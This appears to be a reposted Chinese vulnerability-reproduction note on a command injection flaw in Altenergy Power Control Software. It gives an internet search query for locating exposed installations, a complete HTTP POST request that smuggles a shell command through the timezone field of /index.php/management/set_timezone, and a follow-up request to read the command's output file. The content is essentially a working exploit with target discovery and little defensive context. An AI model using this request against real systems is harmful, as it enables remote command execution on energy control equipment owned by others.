登录 白背景

Altenergy电力系统控制软件存在命令执行漏洞

一、漏洞简介

Altenergy电力系统控制软件存在命令执行漏洞

二、影响版本

Altenergy

三、资产测绘

title="Altenergy Power Control Software"

1723871214697-dfb4636a-33ab-4234-9211-19d87c9d1665.png

四、漏洞复现

POST /index.php/management/set_timezone HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

timezone=`id > rce.txt`

1723871418342-5cb40b50-27f5-4e59-b02d-3898027b20b0.png

/rce.txt

1723871458335-1f7253df-2d68-4c0c-92a5-ae50c5652dee.png

原文: https://www.yuque.com/xiaokp7/ocvun2/fhxp158kvrb4ourf